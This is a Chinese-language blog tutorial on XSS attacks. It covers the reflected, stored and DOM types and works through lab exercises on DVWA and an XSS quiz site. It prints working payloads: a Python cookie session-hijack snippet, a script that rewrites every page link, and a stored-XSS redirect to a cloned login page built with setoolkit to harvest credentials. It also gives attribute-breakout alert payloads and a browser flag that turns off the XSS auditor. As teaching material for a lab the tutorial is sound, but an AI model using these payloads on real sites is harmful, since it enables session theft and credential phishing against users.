Web安全第8讲 - XSS攻击(上)

最新推荐文章于 2023-03-03 10:45:19 发布
最新推荐文章于 2023-03-03 10:45:19 发布
阅读量505 收藏
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yauger/article/details/104445131
版权

一、XSS跨站脚本分类

跨站脚本攻击(Cross Site Scripting),为了不和 层叠样式表(Cascading Style Sheets ) 的缩写混淆, 故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该 页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的

1.1 cookie介绍(相当于一个通行证)

由于HTTP是一种无状态的协议,服务器单从网络连接上无从知道客户身份。怎么办呢?就 给客户端们颁发一个通行证吧,每人一个,无论谁访问都必须携带自己通行证。这样服务 器就能从通行证上确认客户身份了。这就是Cookie的工作原理。

在这里插入图片描述

1.2 反射型XSS(只有攻击者看到)

  • 反射型XSS又称非持久性XSS,这种攻击往往具有一次性
  • 攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用
    户的请求并进行处理,然后把带有XSS的代码发送给用户。用户浏览器解析执行代码,触发XSS漏洞

1.3 存储型XSS(持久型、 每个用户都能看到)

  • 存储型XSS又称持久型XSS,攻击脚本存储在目标服务器的数据库中,具有更强的隐蔽性
  • 攻击者在论坛、博客、留言板中,发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数 据库中。当用户进行正常访问时,触发XSS代码
    在这里插入图片描述
    在这里插入图片描述

1.4 DOM型XSS

  • DOM型XSS全称Document Object Model,使用DOM动态访问更新文档的内容、结构及样式
  • 服务器响应不会处理攻击者脚本,而是用户浏览器处理这个响应时,DOM对象就会处理XSS代 码,触发XSS漏洞

在这里插入图片描述

1.5 通过Python利用cookie会话劫持

cookie = "security=low; csrftoken=EIe9fIFCRE4BXu8bqHKRX60hfih1bZAnMFMA8w2DtTygLGXcemxxiAyeAqsJPXhi; PHPSESSID=g2ii9pn9u0sck0shjvcqtfgne0"

cookie = {i.split("=")[0]:i.split("=")[1] for i in cookie.split("; ")}

html = requests.get('http://127.0.0.1/DVWA/index.php',headers=headers).text

劫持会话后的操作

  • 1.获取页面数据
  • 2.劫持前端逻辑
  • 3.发送请求
  • 4.偷取用户资料
  • 5.偷取用户密码和登录状态

二、XSS窜改网页链接

<script>
window.onload = function(){
    var link = document.getElementsByTagName("a");
    for(j=0;j<link.length;j++){
        link[j].href = "http://www.baidu.com";
    }
}
</script>

2.1 XSS盗取用户信息原理

克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登录页面, 用户输入登录,账号和密码被存储

2.2 setoolkit工具克隆网站

在kali中输入 setoolkit

1.社会工程攻击>1

2.网站攻击>2

3.凭据收集攻击>3

4.root网站克隆>2

2.3 存储XSS跳转克隆网站

在DVWA中XSS(Stored)中执行

<script>
window.location = "http://192.168.154.130/";
</script>

在这里插入图片描述

三、XSS攻击

实验环境
https://xss-quiz.int21h.jp/

3.1 探测XSS过程

  • 1、构造一个不会被识别为恶意代码的字符串提交到页面中
  • 2、使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示

3.2 闭合文本标签利用XSS

简单的 payload

<script>alert(document.domain);</script>

闭合标签的 payload

"</b><script>alert(document.domain);</script>

3.3 配置Chrome关闭XSS-Auditor

  • 如果谷歌浏览器打开网址探测时出现以下情况:
    在这里插入图片描述

  • 需要配置Chrome :–args --disable-xss-auditor

  • 在桌面新建一个快捷方式

    "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor

3.4 属性中的XSS发现

技巧:ctrl+f 全局搜索输入的内容
闭合引号,尖括号,引入script脚本

123"><script>alert(document.domain);</script>

在这里插入图片描述

3.5 属性中的XSS发现

onmouseover 鼠标悬停弹出

" onmouseover= " alert(document.domain)>
或者
123" onmouseover= " alert(document.domain)>
Yauger
关注
专栏目录
《网络安全学习》 第三部分-----XSS攻击系列学习
tomatocc的博客
01-20 3281
XSS的常见攻击方式: 反射型 存储型 第一种:反射型XSS攻击 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。 模拟反射型XSS攻击: 通过构建Node应用,演示反射型XSS攻击。后台框架位jfinal,页面渲染也是jfinal,其他框架的话只...
网络安全学习第8篇 - xss攻击(java实现反射型xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
一清道长的个人博客
05-14 4004
请依据课堂所解的关于XSS攻防的技术知识,结合你所学过的Web前端编程技术自行设计一套XSS攻防流程。要求: 1、攻防技术的实现既要有深度也要有广度。 2、需要设计一个前端页面。 3、提交时请提交实验报告以及Web前端代码。 实验文件.rar (1)什么是xss? 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出...
Web前端安全系列之:XSS攻防
最新发布
javagty6778的博客
03-03 167
Web` 攻击技术的发展也可以分为几个阶段。在 `Web 1.0` 时代,人们更多的是关注服务器端动态脚本的安全问题,比如将一个可执行脚本(俗称 `webshell`)上传到服务器上,从而获得权限。后续有出现了`SQL`注入,`SQL`注入的出现是`Web`安全史上的一个里程碑,`SQL`注入漏洞至今仍然是`Web`安全领域中的一个重要组成部分。再后续另一个里程碑的安全问题问世--`XSS`(跨站脚本攻击)。伴随着 `Web 2.0` 的兴起,`XSS`、`CSRF` 等攻击已经变得更为强大。
聊一聊XSS
test
10-13 633
前言 首先说说为什么要写这一篇博文,除了为了记录自己学习了什么东西之外。最主要的原因是师兄兼老师@xjseck,这一周的布置的实验报告正好是关于xss的,借此机会梳理一下一些简单的关于xss的知识。 首先什么是XSSXSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS,比较合适的...
XSS攻击常识及常见的XSS攻击脚本汇总
极客神殿
02-06 7320
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里中罗列一
XSS-8注入靶场闯关(小游戏)——第八关
qq_39330735的博客
02-04 911
XSS-8注入靶场闯关(小游戏)——第八关,通关详解,HTML的十进制实体字符串绕过
WEB攻击手段及防御第1篇-XSS
茅坤宝骏氹的博客
05-05 285
转载自 WEB攻击手段及防御第1篇-XSS概念XSS全称为Cross Site Script,即跨站点脚本攻击,XSS攻击是最为普遍且中招率最多的web攻击方式,一般攻击者通过在网页恶意植入攻击脚本来篡改网页,在用户浏览网页时就能执行恶意的操作,像html、css、img都有可能被攻击。像前不久微信貌似就中招,好像是在朋友圈发送一个带有脚本的链接,然后通过点击该链接就会弹出一个提示,虽然没有造成什...
Web安全第9 - XSS攻击(下)
Yauger的博客
03-05 314
一、属性中的XSS发现 1、 select元素可创建单选或多选菜单 <select name="p2"> <option>Japan</option> <option>Germany</option> <option>USA</option> <option>United...
Java防止xss攻击附相关文件下载
08-25
Java防止XSS攻击的核心策略是确保用户输入的数据在显示到网页上之前被适当地编码、转义或过滤,以防止恶意脚本被执行。XSS(跨站脚本)攻击是由于网页应用程序未能正确处理用户输入的数据,使得攻击者能够注入恶意...
Springboot 阻止XSS攻击
web13985085406的博客
08-02 863
写此文章的目的是为了记录一下在工作中解决的XSS漏洞问题。XSS漏洞是生产上比较常见的问题。虽然是比较常见并且是基本的安全问题,但是我们没有做??,也怪我没有安全意识。于是终于有一天被制裁了。所以这次就补上了,记录一下。就是注意要分情况处理。拦截器处理一部分,并注意拦截器的注册方式Jackson的方式处理另一部分,也是注意配置方式让我们共同进步。...
XSS中途补WEB开发学习【前端粗学习】
taozijun的博客
07-28 326
学习XSS的时候遇到一些问题,决定用几天学一下基础的WEB开发的知识,以求以后做题的时候思路不要那么局限。 这篇是学习前端开发基础的一些体会 博主看的教程 - &gt;网易云课堂上面的螺钉课堂发布的html + css系列和javascript入门系列,html和css简单地浏览略过即可。 一。编写工具 学习网络开发首先需要一个开发工具,总不可能用记事本打网页(滑稽) 了解到了“HBui...
前段黑客技术学习①——XSS
熊俊坤的博客
11-07 4033
xss是一种又热门又不太受重视的Web攻击手法,为什么会这样呢?原因有下:1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需要基本的html、js功底,后期需要扎实的html、js、actionscript2/3.0等语言的功底 5、是一种被动的攻击手法
xss攻击相关知识
爱米酱的博客
12-16 661
1.什么是XSS攻击XSS就是跨站脚本攻击,会想尽一切方法 将一段脚本内容放到目标网站的目标浏览器上解释执行。 它分为两类:(1)非持久型 ,它是一次性的,仅对当前页面产生影响 (2)持久型,攻击数据将存储在服务端,攻击行为将随着攻击数据一直存在。 2.简单模拟攻击过程 (1)通过评论表单提交将 <scr...
xss攻防浅谈
weixin_34356310的博客
07-23 163
2019独角兽企业重金招聘Python工程师标准>>> ...
【34】WEB安全学习----XSS攻击2
尚未佩妥剑 转眼便江湖
10-07 326
一、JavaScript事件 在构造XSS代码时,如果对&lt;&gt;进行了编码或过滤,那么无法结束和新建HTML元素,此时可以用事件进行触发(这里不讨论利用HTML标签属性值进行触发,因为只支持少部分浏览器)。 JavaScript脚本中的事件是指用户载入目标页面直到该页面被关闭期间浏览器的动作,以及该页面对用户操作的响应。 窗口事件 当用户执行某些会影响浏览器窗口的操作时,就会发生窗...
关于xss
weixin_30809333的博客
05-03 79
关于xss 个人挺喜欢安全相关的,不知道有没有机会从事这个行业。 什么是xss xss(跨站脚本攻击) ,并不是直接攻击受害者,这是一种间接的攻击方式。 利用受害者可能访问的网站,通过这个网站把恶意代码传递给受害者。 能行成xss 攻击可能性 在一个网站中,如果接受用户的输入(比如能够评论的网站),就有形成xss攻击的可能。 什么才算是xss 攻击 javascript 在浏览器的局限性,不能操作...
XSS漏洞原理与防护措施
qq_50905066的博客
03-27 9433
xss漏洞,既跨站脚本攻击 xss分类: 大致可以分为储存型与反射型。 储存型:最直接的危害类型,跨站代码存储在服务器(数据库)。 反射型:反射型跨站脚本漏洞,最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。 如图 图中所示位储存型xss攻击流程。攻击者要先搭建起恶意服务器。构建xss恶意脚本,通过留言,评论,注册等各种正常服务器可以上传的位置上传恶意脚本。 服务器会将恶意脚本保存在数据库中,当正常用户访问服务器并查看了该恶意脚本时,服务器会将xss的恶意脚本返回至用户浏览器。 这时用
信息安全XSS攻击
小灰的博客
02-28 1017
一、概述 ​ XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。一般XSS可以分为如下几种常见类型: ​ 1.反射性XSS; ​ 2.存储型XSS; ​ 3.DOM型XSS; 二、环境 靶场:Pikachu 浏览器:火狐 三、反射型 交互的数据一般不会被存放在数据库里,一次性,所见即所得,一般出现在查询类页面等。 1.首先输入一些特殊字符
Web安全学习篇——XSS基础知识
Venscor技术养成之路
10-28 2140
之前一直都是做的Android客户端安全,也发现了一些安全问题。但后来,渐渐觉得Android App层安全,尤其是偏上层的安全,往往利用条件比较鸡肋,即使是危害比较大的漏洞。所以从今天起,基本放弃App层上层漏洞挖掘工作,后面像两个方向发展,一是Android App的逆向和加固技术,二是web安全。先从web安全开始!本篇记录XSS基础知识学习过程。一、XSS分类XSS漏洞分成三类,反射型XSS
XSS攻击与防御手册:全面解析Web安全
第八部分,"上傳XSS腳本" 某些网站允许用户上传文件,攻击者可能会利用这个功能上传含有恶意脚本的文件,例如HTML、CSS或图片文件,当其他用户预览或下载这些文件时,XSS攻击可能发生。 第九部分,"實踐XSS釣魚" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值